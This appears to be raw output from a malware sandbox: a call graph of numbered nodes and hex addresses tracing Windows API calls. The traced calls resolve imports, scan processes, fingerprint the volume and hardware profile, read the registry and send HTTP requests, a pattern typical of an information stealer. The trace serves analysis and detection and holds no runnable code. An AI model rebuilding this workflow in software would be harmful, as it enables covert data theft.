3434a5 88572->88573 88574 3420e8 80 API calls 88573->88574 88575 3434bb 88574->88575 88576 3420e8 80 API calls 88575->88576 88577 3434d1 88576->88577 88578 3420e8 80 API calls 88577->88578 88579 3434e7 88578->88579 88580 3420e8 80 API calls 88579->88580 88581 343500 88580->88581 88582 3420e8 80 API calls 88581->88582 88583 343516 88582->88583 88584 3420e8 80 API calls 88583->88584 88585 34352c 88584->88585 88586 3420e8 80 API calls 88585->88586 88587 343542 88586->88587 88588 3420e8 80 API calls 88587->88588 88589 343558 88588->88589 88590 3420e8 80 API calls 88589->88590 88591 34356e 88590->88591 88592 3420e8 80 API calls 88591->88592 88593 343587 88592->88593 88594 3420e8 80 API calls 88593->88594 88595 34359d 88594->88595 88596 3420e8 80 API calls 88595->88596 88597 3435b3 88596->88597 88598 3420e8 80 API calls 88597->88598 88599 3435c8 88598->88599 88600 3420e8 80 API calls 88599->88600 88601 3435de 88600->88601 88602 3420e8 80 API calls 88601->88602 88603 3435f4 88602->88603 88604 3420e8 80 API calls 88603->88604 88605 34360d 88604->88605 88606 3420e8 80 API calls 88605->88606 88607 343623 88606->88607 88608 3420e8 80 API calls 88607->88608 88609 343639 88608->88609 88610 3420e8 80 API calls 88609->88610 88611 34364e 88610->88611 88612 3420e8 80 API calls 88611->88612 88613 343664 88612->88613 88614 3420e8 80 API calls 88613->88614 88615 34367a 88614->88615 88616 3420e8 80 API calls 88615->88616 88617 343693 88616->88617 88618 3420e8 80 API calls 88617->88618 88619 3436a9 88618->88619 88620 3420e8 80 API calls 88619->88620 88621 3436bf 88620->88621 88622 3420e8 80 API calls 88621->88622 88623 3436d5 88622->88623 88624 3420e8 80 API calls 88623->88624 88625 3436eb 88624->88625 88626 3420e8 80 API calls 88625->88626 88627 343700 88626->88627 88628 3420e8 80 API calls 88627->88628 88629 343719 88628->88629 88630 3420e8 80 API calls 88629->88630 88631 34372f 88630->88631 88632 3420e8 80 API calls 88631->88632 88633 343745 88632->88633 88634 3420e8 80 API calls 88633->88634 88635 34375b 88634->88635 88636 3420e8 80 API calls 88635->88636 88637 343771 88636->88637 88638 3420e8 80 API calls 88637->88638 88639 343787 88638->88639 88640 3420e8 80 API calls 88639->88640 88641 34379f 88640->88641 88642 3420e8 80 API calls 88641->88642 88643 3437b5 88642->88643 88644 3420e8 80 API calls 88643->88644 88645 3437ca 88644->88645 88646 3420e8 80 API calls 88645->88646 88647 3437df 88646->88647 88648 3420e8 80 API calls 88647->88648 88649 3437f5 88648->88649 88650 3420e8 80 API calls 88649->88650 88651 34380a 88650->88651 88652 3420e8 80 API calls 88651->88652 88653 343823 88652->88653 88654 3420e8 80 API calls 88653->88654 88655 343839 88654->88655 88656 3420e8 80 API calls 88655->88656 88657 34384f 88656->88657 88658 3420e8 80 API calls 88657->88658 88659 343865 88658->88659 88660 3420e8 80 API calls 88659->88660 88661 34387b 88660->88661 88662 3420e8 80 API calls 88661->88662 88663 343891 88662->88663 88664 3420e8 80 API calls 88663->88664 88665 3438a9 88664->88665 88666 3420e8 80 API calls 88665->88666 88667 3438be 88666->88667 88668 3420e8 80 API calls 88667->88668 88669 3438d3 88668->88669 88670 3420e8 80 API calls 88669->88670 88671 3438e9 88670->88671 88672 3420e8 80 API calls 88671->88672 88673 3438ff 88672->88673 88674 3420e8 80 API calls 88673->88674 88675 343914 88674->88675 88676 3420e8 80 API calls 88675->88676 88677 34392d 88676->88677 88678 3420e8 80 API calls 88677->88678 88679 343943 88678->88679 88680 3420e8 80 API calls 88679->88680 88681 343958 88680->88681 88682 3420e8 80 API calls 88681->88682 88683 34396e 88682->88683 88684 3420e8 80 API calls 88683->88684 88685 343984 88684->88685 88686 3420e8 80 API calls 88685->88686 88687 343999 88686->88687 88688 3420e8 80 API calls 88687->88688 88689 3439b2 88688->88689 88690 3420e8 80 API calls 88689->88690 88691 3439c8 88690->88691 88692 3420e8 80 API calls 88691->88692 88693 3439de 88692->88693 88694 3420e8 80 API calls 88693->88694 88695 3439f3 88694->88695 88696 3420e8 80 API calls 88695->88696 88697 343a09 88696->88697 88698 3420e8 80 API calls 88697->88698 88699 343a1f 88698->88699 88700 3420e8 80 API calls 88699->88700 88701 343a38 88700->88701 88702 3420e8 80 API calls 88701->88702 88703 343a4e 88702->88703 88704 3420e8 80 API calls 88703->88704 88705 343a64 88704->88705 88706 3420e8 80 API calls 88705->88706 88707 343a79 88706->88707 88708 3420e8 80 API calls 88707->88708 88709 343a8f 88708->88709 88710 3420e8 80 API calls 88709->88710 88711 343aa5 88710->88711 88712 3420e8 80 API calls 88711->88712 88713 343abe 88712->88713 88714 3420e8 80 API calls 88713->88714 88715 343ad3 88714->88715 88716 3420e8 80 API calls 88715->88716 88717 343ae9 88716->88717 88718 3420e8 80 API calls 88717->88718 88719 343aff 88718->88719 88720 3420e8 80 API calls 88719->88720 88721 343b15 88720->88721 88722 3420e8 80 API calls 88721->88722 88723 343b2b 88722->88723 88724 3420e8 80 API calls 88723->88724 88725 343b44 88724->88725 88726 3420e8 80 API calls 88725->88726 88727 343b5a 88726->88727 88728 3420e8 80 API calls 88727->88728 88729 343b6f 88728->88729 88730 3420e8 80 API calls 88729->88730 88731 343b84 88730->88731 88732 3420e8 80 API calls 88731->88732 88733 343b99 88732->88733 88734 3420e8 80 API calls 88733->88734 88735 343bae 88734->88735 88736 3420e8 80 API calls 88735->88736 88737 343bc7 88736->88737 88738 3420e8 80 API calls 88737->88738 88739 343bdd 88738->88739 88740 3420e8 80 API calls 88739->88740 88741 343bf2 88740->88741 88742 3420e8 80 API calls 88741->88742 88743 343c08 88742->88743 88744 3420e8 80 API calls 88743->88744 88745 343c1d 88744->88745 88746 3420e8 80 API calls 88745->88746 88747 343c33 88746->88747 88748 3420e8 80 API calls 88747->88748 88749 343c4c 88748->88749 88750 3420e8 80 API calls 88749->88750 88751 343c61 88750->88751 88752 3420e8 80 API calls 88751->88752 88753 343c76 88752->88753 88754 3420e8 80 API calls 88753->88754 88755 343c8c 88754->88755 88756 3420e8 80 API calls 88755->88756 88757 343ca2 88756->88757 88758 3420e8 80 API calls 88757->88758 88759 343cb8 88758->88759 88760 3420e8 80 API calls 88759->88760 88761 343cd1 88760->88761 88762 3420e8 80 API calls 88761->88762 88763 343ce7 88762->88763 88764 3420e8 80 API calls 88763->88764 88765 343cfd 88764->88765 88766 3420e8 80 API calls 88765->88766 88767 343d13 88766->88767 88768 3420e8 80 API calls 88767->88768 88769 343d28 88768->88769 88770 3420e8 80 API calls 88769->88770 88771 343d3d 88770->88771 88772 3420e8 80 API calls 88771->88772 88773 343d58 88772->88773 88774 3420e8 80 API calls 88773->88774 88775 343d6d 88774->88775 88776 3420e8 80 API calls 88775->88776 88777 343d83 88776->88777 88778 3420e8 80 API calls 88777->88778 88779 343d99 88778->88779 88780 3420e8 80 API calls 88779->88780 88781 343daf 88780->88781 88782 3420e8 80 API calls 88781->88782 88783 343dc5 88782->88783 88784 3420e8 80 API calls 88783->88784 88785 343dde 88784->88785 88786 3420e8 80 API calls 88785->88786 88787 343df4 88786->88787 88788 3420e8 80 API calls 88787->88788 88789 343e09 88788->88789 88790 3420e8 80 API calls 88789->88790 88791 343e1e 88790->88791 88792 3420e8 80 API calls 88791->88792 88793 343e34 88792->88793 88794 3420e8 80 API calls 88793->88794 88795 343e49 88794->88795 88796 3420e8 80 API calls 88795->88796 88797 343e62 88796->88797 88798 3420e8 80 API calls 88797->88798 88799 343e78 88798->88799 88800 3420e8 80 API calls 88799->88800 88801 343e8d 88800->88801 88802 3420e8 80 API calls 88801->88802 88803 343ea2 88802->88803 88804 3420e8 80 API calls 88803->88804 88805 343eb8 88804->88805 88806 3420e8 80 API calls 88805->88806 88807 343ece 88806->88807 88808 3420e8 80 API calls 88807->88808 88809 343ee7 88808->88809 88810 355edc 88809->88810 88811 355ee9 50 API calls 88810->88811 88812 35635b 9 API calls 88810->88812 88811->88812 88813 3563fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88812->88813 88814 35646a 88812->88814 88813->88814 88815 356477 8 API calls 88814->88815 88816 35652a 88814->88816 88815->88816 88817 3565a1 88816->88817 88818 356533 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88816->88818 88819 356633 88817->88819 88820 3565ae 6 API calls 88817->88820 88818->88817 88821 356640 9 API calls 88819->88821 88822 35670a 88819->88822 88820->88819 88821->88822 88823 356781 88822->88823 88824 356713 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88822->88824 88825 3567b3 88823->88825 88826 35678a GetProcAddress GetProcAddress 88823->88826 88824->88823 88827 3567e5 88825->88827 88828 3567bc GetProcAddress GetProcAddress 88825->88828 88826->88825 88829 3568d1 88827->88829 88830 3567f2 10 API calls 88827->88830 88828->88827 88831 356931 88829->88831 88832 3568da GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88829->88832 88830->88829 88833 35694c 88831->88833 88834 35693a GetProcAddress 88831->88834 88832->88831 88835 356955 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88833->88835 88836 3569ac 88833->88836 88834->88833 88835->88836 88837 3569b5 GetProcAddress 88836->88837 88838 3569c6 88836->88838 88837->88838 88838->87881 88840 34fe64 CloseHandle 88839->88840 88841 34fe38 Process32Next 88839->88841 88840->88077 88841->88840 88842 34fe4a StrCmpCA 88841->88842 88842->88841 88843 34fe5e 88842->88843 88843->88841 90174 359027 88844->90174 88846 3590a0 88846->88082 88848 34e57d lstrcpyA 88847->88848 88849 34f6c8 88848->88849 88850 34e57d lstrcpyA 88849->88850 88851 34f6d6 GetSystemTime 88850->88851 88852 34f6f3 88851->88852 88852->87884 88855 34e6a7 88853->88855 88854 34e6cb 88854->87902 88855->88854 88856 34e6b9 lstrcpyA lstrcatA 88855->88856 88856->88854 88858 34e5b4 lstrcpyA 88857->88858 88859 341334 88858->88859 88860 34e5b4 lstrcpyA 88859->88860 88861 341340 88860->88861 88862 34e5b4 lstrcpyA 88861->88862 88863 34134c 88862->88863 88864 34e5b4 lstrcpyA 88863->88864 88865 341364 88864->88865 88866 351f08 88865->88866 88867 351f1b 88866->88867 88868 34e5f1 2 API calls 88867->88868 88869 351f29 88868->88869 88870 34e5f1 2 API calls 88869->88870 88871 351f32 88870->88871 88872 34e5f1 2 API calls 88871->88872 88873 351f3b 88872->88873 88874 34e57d lstrcpyA 88873->88874 88875 351f48 88874->88875 88876 34e57d lstrcpyA 88875->88876 88877 351f51 88876->88877 88878 34e57d lstrcpyA 88877->88878 88879 351f5a 88878->88879 88880 34e57d lstrcpyA 88879->88880 88881 351f63 88880->88881 88882 34e57d lstrcpyA 88881->88882 88883 351f6c 88882->88883 88884 34e57d lstrcpyA 88883->88884 88893 351f75 88884->88893 88885 342039 lstrcpyA 88885->88893 88886 342078 lstrcpyA 88886->88893 88887 351509 28 API calls 88887->88893 88888 352042 StrCmpCA 88888->88893 88889 3520a0 StrCmpCA 88890 352663 88889->88890 88889->88893 88891 34e63b lstrcpyA 88890->88891 88892 35266f 88891->88892 88894 342078 lstrcpyA 88892->88894 88893->88885 88893->88886 88893->88887 88893->88888 88893->88889 88896 3521d8 StrCmpCA 88893->88896 88900 34204e lstrcpyA 88893->88900 88903 342063 lstrcpyA 88893->88903 88908 352310 StrCmpCA 88893->88908 88919 34e63b lstrcpyA 88893->88919 88920 34208d lstrcpyA 88893->88920 88923 352448 StrCmpCA 88893->88923 88927 35217a StrCmpCA 88893->88927 88932 35257a StrCmpCA 88893->88932 88934 34e5b4 lstrcpyA 88893->88934 88938 3420a2 lstrcpyA 88893->88938 88940 3522b2 StrCmpCA 88893->88940 88948 3523ea StrCmpCA 88893->88948 88950 341324 lstrcpyA 88893->88950 88951 352522 StrCmpCA 88893->88951 88952 351471 23 API calls 88893->88952 88895 352678 88894->88895 88897 34e63b lstrcpyA 88895->88897 88896->88893 88898 352631 88896->88898 88899 352682 88897->88899 88901 34e63b lstrcpyA 88898->88901 90209 3420be lstrcpyA 88899->90209 88900->88893 88902 35263d 88901->88902 90205 342078 88902->90205 88903->88893 88906 3525c5 88910 34e63b lstrcpyA 88906->88910 88908->88893 88911 3525ff 88908->88911 88909 34e63b lstrcpyA 88913 352650 88909->88913 88912 35269d 88910->88912 88914 34e63b lstrcpyA 88911->88914 90192 35162f 88912->90192 90208 3420be lstrcpyA 88913->90208 88915 35260b 88914->88915 90203 3420a2 lstrcpyA 88915->90203 88919->88893 88920->88893 88921 352614 88922 34e63b lstrcpyA 88921->88922 88925 35261e 88922->88925 88923->88893 88924 3525ca 88923->88924 88926 34e63b lstrcpyA 88924->88926 90204 3420d3 lstrcpyA 88925->90204 88928 3525d6 88926->88928 88927->88893 90201 3420a2 lstrcpyA 88928->90201 88931 3525df 88933 34e63b lstrcpyA 88931->88933 88935 352595 88932->88935 88936 352585 Sleep 88932->88936 88937 3525e9 88933->88937 88934->88893 88939 34e63b lstrcpyA 88935->88939 88936->88893 90202 3420d3 lstrcpyA 88937->90202 88938->88893 88941 3525a1 88939->88941 88940->88893 90199 3420a2 lstrcpyA 88941->90199 88944 3525aa 88945 34e63b lstrcpyA 88944->88945 88946 3525b4 88945->88946 90200 3420a2 lstrcpyA 88946->90200 88947 3526b1 88947->87915 88948->88893 88950->88893 88951->88893 88952->88893 88954 34e63b lstrcpyA 88953->88954 88955 35188e 88954->88955 88956 34e63b lstrcpyA 88955->88956 88957 35189a 88956->88957 88958 34e63b lstrcpyA 88957->88958 88959 3518a6 88958->88959 88959->87918 88961 34e5cb 88960->88961 88962 34e5e0 88961->88962 88963 34e5d8 lstrcpyA 88961->88963 88962->87931 88963->88962 88964->87951 88966 34f0a6 GetVolumeInformationA 88965->88966 88967 34f09f 88965->88967 88968 34f0d6 88966->88968 88967->88966 88969 34f108 GetProcessHeap HeapAlloc 88968->88969 88970 34f12c wsprintfA lstrcatA 88969->88970 88971 34f11e 88969->88971 90210 34efba GetCurrentHwProfileA 88970->90210 88972 34e57d lstrcpyA 88971->88972 88974 34f127 88972->88974 88974->87965 88975 34f15c 88976 34f165 lstrlenA 88975->88976 88977 34f17a 88976->88977 90226 34fc4f lstrcpyA malloc strncpy 88977->90226 88979 34f184 88980 34f18e lstrcatA 88979->88980 88981 34f19e 88980->88981 88982 34e57d lstrcpyA 88981->88982 88983 34f1af 88982->88983 88983->88974 88985 34e5b4 lstrcpyA 88984->88985 88986 343f98 88985->88986 90230 343ef3 88986->90230 88988 343fa4 88989 34e57d lstrcpyA 88988->88989 88990 343fc2 88989->88990 88991 34e57d lstrcpyA 88990->88991 88992 343fcb 88991->88992 88993 34e57d lstrcpyA 88992->88993 88994 343fd4 88993->88994 88995 34e57d lstrcpyA 88994->88995 88996 343fdd 88995->88996 88997 34e57d lstrcpyA 88996->88997 88998 343fe6 88997->88998 88999 343ff7 InternetOpenA StrCmpCA 88998->88999 89000 34401a 88999->89000 89001 344486 InternetCloseHandle 89000->89001 89002 34f6b1 2 API calls 89000->89002 89014 34449a 89001->89014 89003 344031 89002->89003 89004 34e682 2 API calls 89003->89004 89005 344040 89004->89005 89006 34e63b lstrcpyA 89005->89006 89007 344049 89006->89007 89008 34e6d4 3 API calls 89007->89008 89009 34406b 89008->89009 89010 34e63b lstrcpyA 89009->89010 89011 344074 89010->89011 89012 34e6d4 3 API calls 89011->89012 89013 34408e 89012->89013 89015 34e63b lstrcpyA 89013->89015 89014->87969 89016 344097 89015->89016 89017 34e682 2 API calls 89016->89017 89018 3440af 89017->89018 89019 34e63b lstrcpyA 89018->89019 89020 3440b8 89019->89020 89021 34e6d4 3 API calls 89020->89021 89022 3440d1 89021->89022 89023 34e63b lstrcpyA 89022->89023 89024 3440da 89023->89024 89025 34e6d4 3 API calls 89024->89025 89026 3440ef 89025->89026 89027 34e63b lstrcpyA 89026->89027 89028 3440f8 89027->89028 89029 34e6d4 3 API calls 89028->89029 89030 34411a 89029->89030 89031 34e682 2 API calls 89030->89031 89032 344121 89031->89032 89033 34e63b lstrcpyA 89032->89033 89034 34412a 89033->89034 89035 34413a InternetConnectA 89034->89035 89035->89001 89036 344164 HttpOpenRequestA 89035->89036 89037 34419c 89036->89037 89038 34447d InternetCloseHandle 89036->89038 89039 3441a2 InternetSetOptionA 89037->89039 89040 3441b8 89037->89040 89038->89001 89039->89040 89041 34e6d4 3 API calls 89040->89041 89042 3441c5 89041->89042 89043 34e63b lstrcpyA 89042->89043 89044 3441ce 89043->89044 89045 34e682 2 API calls 89044->89045 89046 3441e6 89045->89046 89047 34e63b lstrcpyA 89046->89047 89048 3441ef 89047->89048 89049 34e6d4 3 API calls 89048->89049 89050 344204 89049->89050 89051 34e63b lstrcpyA 89050->89051 89052 34420d 89051->89052 89053 34e6d4 3 API calls 89052->89053 89054 344227 89053->89054 89055 34e63b lstrcpyA 89054->89055 89056 344230 89055->89056 89057 34e6d4 3 API calls 89056->89057 89058 344249 89057->89058 89059 34e63b lstrcpyA 89058->89059 89060 344252 89059->89060 89061 34e6d4 3 API calls 89060->89061 89062 34426b 89061->89062 89063 34e63b lstrcpyA 89062->89063 89064 344274 89063->89064 89065 34e682 2 API calls 89064->89065 89066 34428c 89065->89066 89067 34e63b lstrcpyA 89066->89067 89068 344295 89067->89068 89069 34e6d4 3 API calls 89068->89069 89070 3442aa 89069->89070 89071 34e63b lstrcpyA 89070->89071 89072 3442b3 89071->89072 89073 34e6d4 3 API calls 89072->89073 89074 3442c8 89073->89074 89075 34e63b lstrcpyA 89074->89075 89076 3442d1 89075->89076 89077 34e682 2 API calls 89076->89077 89078 3442e9 89077->89078 89079 34e63b lstrcpyA 89078->89079 89080 3442f2 89079->89080 89081 34e6d4 3 API calls 89080->89081 89082 344307 89081->89082 89083 34e63b lstrcpyA 89082->89083 89084 344310 89083->89084 89085 34e6d4 3 API calls 89084->89085 89086 34432a 89085->89086 89087 34e63b lstrcpyA 89086->89087 89088 344333 89087->89088 89089 34e6d4 3 API calls 89088->89089 89090 34434c 89089->89090 89091 34e63b lstrcpyA 89090->89091 89092 344355 89091->89092 89093 34e6d4 3 API calls 89092->89093 89094 34436e 89093->89094 89095 34e63b lstrcpyA 89094->89095 89096 344377 89095->89096 89097 34e682 2 API calls 89096->89097 89098 34438f 89097->89098 89099 34e63b lstrcpyA 89098->89099 89100 344398 89099->89100 89101 34e57d lstrcpyA 89100->89101 89102 3443a9 89101->89102 89103 34e682 2 API calls 89102->89103 89104 3443c1 89103->89104 89105 34e682 2 API calls 89104->89105 89106 3443c8 89105->89106 89107 34e63b lstrcpyA 89106->89107 89108 3443d1 89107->89108 89109 3443e9 lstrlenA 89108->89109 89110 3443f9 89109->89110 89111 344402 lstrlenA 89110->89111 90238 34e766 89111->90238 89113 344412 HttpSendRequestA 89114 344457 InternetReadFile 89113->89114 89115 34446e InternetCloseHandle 89114->89115 89118 344424 89114->89118 89116 34e5e8 89115->89116 89116->89038 89117 34e6d4 3 API calls 89117->89118 89118->89114 89118->89115 89118->89117 89119 34e63b lstrcpyA 89118->89119 89119->89118 90241 34e766 89120->90241 89122 350c72 StrCmpCA 89123 350c84 89122->89123 89124 350c7d ExitProcess 89122->89124 89125 350c94 strtok_s 89123->89125 89137 350dc2 89125->89137 89139 350ca5 89125->89139 89126 350da5 strtok_s 89126->89137 89126->89139 89127 350d65 StrCmpCA 89127->89126 89128 350d95 StrCmpCA 89128->89126 89129 350d54 StrCmpCA 89129->89126 89129->89139 89130 350d77 StrCmpCA 89130->89126 89131 350d43 StrCmpCA 89131->89126 89131->89139 89132 350ce2 StrCmpCA 89132->89126 89132->89139 89133 350d12 StrCmpCA 89133->89126 89133->89139 89134 350d32 StrCmpCA 89134->89126 89134->89139 89135 350cca StrCmpCA 89135->89126 89135->89139 89136 350cfa StrCmpCA 89136->89126 89136->89139 89137->87973 89138 34e5f1 2 API calls 89138->89139 89139->89126 89139->89127 89139->89128 89139->89129 89139->89130 89139->89131 89139->89132 89139->89133 89139->89134 89139->89135 89139->89136 89139->89138 89141 34e5b4 lstrcpyA 89140->89141 89142 345b01 89141->89142 89143 343ef3 5 API calls 89142->89143 89144 345b0d 89143->89144 89145 34e57d lstrcpyA 89144->89145 89146 345b2b 89145->89146 89147 34e57d lstrcpyA 89146->89147 89148 345b34 89147->89148 89149 34e57d lstrcpyA 89148->89149 89150 345b3d 89149->89150 89151 34e57d lstrcpyA 89150->89151 89152 345b46 89151->89152 89153 34e57d lstrcpyA 89152->89153 89154 345b4f 89153->89154 89155 345b60 InternetOpenA StrCmpCA 89154->89155 89156 345b83 89155->89156 89157 34611c InternetCloseHandle 89156->89157 89159 34f6b1 2 API calls 89156->89159 89158 346137 89157->89158 90248 346a41 CryptStringToBinaryA 89158->90248 89160 345b9a 89159->89160 89161 34e682 2 API calls 89160->89161 89163 345ba9 89161->89163 89165 34e63b lstrcpyA 89163->89165 89170 345bb2 89165->89170 89166 34e5f1 2 API calls 89167 34614c 89166->89167 89168 34e6d4 3 API calls 89167->89168 89169 34615a 89168->89169 89171 34e63b lstrcpyA 89169->89171 89172 34e6d4 3 API calls 89170->89172 89180 346162 89171->89180 89173 345bd4 89172->89173 89174 34e63b lstrcpyA 89173->89174 89175 345bdd 89174->89175 89176 34e6d4 3 API calls 89175->89176 89177 345bf7 89176->89177 89178 34e63b lstrcpyA 89177->89178 89179 345c00 89178->89179 89181 34e682 2 API calls 89179->89181 89180->87983 89182 345c18 89181->89182 89183 34e63b lstrcpyA 89182->89183 89184 345c21 89183->89184 89185 34e6d4 3 API calls 89184->89185 89186 345c3a 89185->89186 89187 34e63b lstrcpyA 89186->89187 89188 345c43 89187->89188 89189 34e6d4 3 API calls 89188->89189 89190 345c58 89189->89190 89191 34e63b lstrcpyA 89190->89191 89192 345c61 89191->89192 89193 34e6d4 3 API calls 89192->89193 89194 345c83 89193->89194 89195 34e682 2 API calls 89194->89195 89196 345c8a 89195->89196 89197 34e63b lstrcpyA 89196->89197 89198 345c93 89197->89198 89199 345ca3 InternetConnectA 89198->89199 89199->89157 89200 345ccd HttpOpenRequestA 89199->89200 89201 345d05 89200->89201 89202 346113 InternetCloseHandle 89200->89202 89203 345d21 89201->89203 89204 345d0b InternetSetOptionA 89201->89204 89202->89157 89205 34e6d4 3 API calls 89203->89205 89204->89203 89206 345d2e 89205->89206 89207 34e63b lstrcpyA 89206->89207 89208 345d37 89207->89208 89209 34e682 2 API calls 89208->89209 89210 345d4f 89209->89210 89211 34e63b lstrcpyA 89210->89211 89212 345d58 89211->89212 89213 34e6d4 3 API calls 89212->89213 89214 345d6d 89213->89214 89215 34e63b lstrcpyA 89214->89215 89216 345d76 89215->89216 89217 34e6d4 3 API calls 89216->89217 89218 345d90 89217->89218 89219 34e63b lstrcpyA 89218->89219 89220 345d99 89219->89220 89221 34e6d4 3 API calls 89220->89221 89222 345db3 89221->89222 89223 34e63b lstrcpyA 89222->89223 89224 345dbc 89223->89224 89225 34e6d4 3 API calls 89224->89225 89226 345dd6 89225->89226 89227 34e63b lstrcpyA 89226->89227 89228 345ddf 89227->89228 89229 34e682 2 API calls 89228->89229 89230 345df7 89229->89230 89231 34e63b lstrcpyA 89230->89231 89232 345e00 89231->89232 89233 34e6d4 3 API calls 89232->89233 89234 345e15 89233->89234 89235 34e63b lstrcpyA 89234->89235 89236 345e1e 89235->89236 89237 34e6d4 3 API calls 89236->89237 89238 345e33 89237->89238 89239 34e63b lstrcpyA 89238->89239 89240 345e3c 89239->89240 89241 34e682 2 API calls 89240->89241 89242 345e54 89241->89242 89243 34e63b lstrcpyA 89242->89243 89244 345e5d 89243->89244 89245 34e6d4 3 API calls 89244->89245 89246 345e72 89245->89246 89247 34e63b lstrcpyA 89246->89247 89248 345e7b 89247->89248 89249 34e6d4 3 API calls 89248->89249 89250 345e95 89249->89250 89251 34e63b lstrcpyA 89250->89251 89252 345e9e 89251->89252 89253 34e6d4 3 API calls 89252->89253 89254 345eb7 89253->89254 89255 34e63b lstrcpyA 89254->89255 89256 345ec0 89255->89256 89257 34e6d4 3 API calls 89256->89257 89258 345ed5 89257->89258 89259 34e63b lstrcpyA 89258->89259 89260 345ede 89259->89260 89261 34e6d4 3 API calls 89260->89261 89262 345ef8 89261->89262 89263 34e63b lstrcpyA 89262->89263 89264 345f01 89263->89264 89265 34e6d4 3 API calls 89264->89265 89266 345f16 89265->89266 89267 34e63b lstrcpyA 89266->89267 89268 345f1f 89267->89268 89269 34e6d4 3 API calls 89268->89269 89270 345f34 89269->89270 89271 34e63b lstrcpyA 89270->89271 89272 345f3d 89271->89272 89273 34e682 2 API calls 89272->89273 89274 345f55 89273->89274 89275 34e63b lstrcpyA 89274->89275 89276 345f5e 89275->89276 89277 34e6d4 3 API calls 89276->89277 89278 345f73 89277->89278 89279 34e63b lstrcpyA 89278->89279 89280 345f7c 89279->89280 89281 34e6d4 3 API calls 89280->89281 89282 345f96 89281->89282 89283 34e63b lstrcpyA 89282->89283 89284 345f9f 89283->89284 89285 34e6d4 3 API calls 89284->89285 89286 345fb8 89285->89286 89287 34e63b lstrcpyA 89286->89287 89288 345fc1 89287->89288 89289 34e6d4 3 API calls 89288->89289 89290 345fd6 89289->89290 89291 34e63b lstrcpyA 89290->89291 89292 345fdf 89291->89292 89293 34e682 2 API calls 89292->89293 89294 345ff7 89293->89294 89295 34e63b lstrcpyA 89294->89295 89296 346000 89295->89296 89297 346010 lstrlenA 89296->89297 90242 34e766 89297->90242 89299 346021 lstrlenA GetProcessHeap HeapAlloc 90243 34e766 89299->90243 89301 346044 lstrlenA 90244 34e766 89301->90244 89303 346054 memcpy 90245 34e766 89303->90245 89305 346066 lstrlenA 89306 346076 89305->89306 89307 34607f lstrlenA memcpy 89306->89307 90246 34e766 89307->90246 89309 34609b lstrlenA 90247 34e766 89309->90247 89311 3460ab HttpSendRequestA 89312 3460f0 InternetReadFile 89311->89312 89313 346107 InternetCloseHandle 89312->89313 89316 3460bd 89312->89316 89313->89202 89314 34e6d4 3 API calls 89314->89316 89315 34e63b lstrcpyA 89315->89316 89316->89312 89316->89313 89316->89314 89316->89315 90253 34e766 89317->90253 89319 35074a strtok_s 89320 3507b3 89319->89320 89321 350757 89319->89321 89320->87987 89322 34e5f1 2 API calls 89321->89322 89323 35079c strtok_s 89321->89323 89324 34e5f1 2 API calls 89321->89324 89322->89323 89323->89320 89323->89321 89324->89321 90254 34e766 89325->90254 89327 350559 strtok_s 89328 35066a 89327->89328 89332 35056a 89327->89332 89328->87999 89329 35061b StrCmpCA 89329->89332 89330 34e5f1 2 API calls 89331 35064d strtok_s 89330->89331 89331->89328 89331->89332 89332->89329 89332->89330 89332->89331 89333 3505ea StrCmpCA 89332->89333 89334 3505c5 StrCmpCA 89332->89334 89335 350597 StrCmpCA 89332->89335 89333->89332 89334->89332 89335->89332 90255 34e766 89336->90255 89338 350697 strtok_s 89339 3506a4 89338->89339 89340 35071d 89338->89340 89341 34e5f1 2 API calls 89339->89341 89342 3506ce StrCmpCA 89339->89342 89343 350706 strtok_s 89339->89343 89344 34e5f1 2 API calls 89339->89344 89340->88014 89341->89343 89342->89339 89343->89339 89343->89340 89344->89339 89346 34e57d lstrcpyA 89345->89346 89347 35289a 89346->89347 89348 34e6d4 3 API calls 89347->89348 89349 3528ab 89348->89349 89350 34e63b lstrcpyA 89349->89350 89351 3528b4 89350->89351 89352 34e6d4 3 API calls 89351->89352 89353 3528ce 89352->89353 89354 34e63b lstrcpyA 89353->89354 89355 3528d7 89354->89355 89356 34e6d4 3 API calls 89355->89356 89357 3528f1 89356->89357 89358 34e63b lstrcpyA 89357->89358 89359 3528fa 89358->89359 89360 34e6d4 3 API calls 89359->89360 89361 35290f 89360->89361 89362 34e63b lstrcpyA 89361->89362 89363 352918 89362->89363 89364 34e6d4 3 API calls 89363->89364 89365 352931 89364->89365 89366 34e63b lstrcpyA 89365->89366 89367 35293a 89366->89367 90256 34e851 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 89367->90256 89369 352947 89370 34e6d4 3 API calls 89369->89370 89371 352954 89370->89371 89372 34e63b lstrcpyA 89371->89372 89373 35295d 89372->89373 89374 34e6d4 3 API calls 89373->89374 89375 352972 89374->89375 89376 34e63b lstrcpyA 89375->89376 89377 35297b 89376->89377 89378 34e6d4 3 API calls 89377->89378 89379 352994 89378->89379 89380 34e63b lstrcpyA 89379->89380 89381 35299d 89380->89381 90257 34ef2d memset RegOpenKeyExA 89381->90257 89383 3529aa 89384 34e6d4 3 API calls 89383->89384 89385 3529b7 89384->89385 89386 34e63b lstrcpyA 89385->89386 89387 3529c0 89386->89387 89388 34e6d4 3 API calls 89387->89388 89389 3529d5 89388->89389 89390 34e63b lstrcpyA 89389->89390 89391 3529de 89390->89391 89392 34e6d4 3 API calls 89391->89392 89393 3529f7 89392->89393 89394 34e63b lstrcpyA 89393->89394 89395 352a00 89394->89395 89396 34efba 7 API calls 89395->89396 89397 352a11 89396->89397 89398 34e682 2 API calls 89397->89398 89399 352a1f 89398->89399 89400 34e63b lstrcpyA 89399->89400 89401 352a28 89400->89401 89402 34e6d4 3 API calls 89401->89402 89403 352a45 89402->89403 89404 34e63b lstrcpyA 89403->89404 89405 352a4e 89404->89405 89406 34e6d4 3 API calls 89405->89406 89407 352a67 89406->89407 89408 34e63b lstrcpyA 89407->89408 89409 352a70 89408->89409 89410 34f078 15 API calls 89409->89410 89411 352a81 89410->89411 89412 34e682 2 API calls 89411->89412 89413 352a8f 89412->89413 89414 34e63b lstrcpyA 89413->89414 89415 352a98 89414->89415 89416 34e6d4 3 API calls 89415->89416 89417 352aba 89416->89417 89418 34e63b lstrcpyA 89417->89418 89419 352ac3 89418->89419 89420 34e6d4 3 API calls 89419->89420 89421 352adc 89420->89421 89422 34e63b lstrcpyA 89421->89422 89423 352ae5 89422->89423 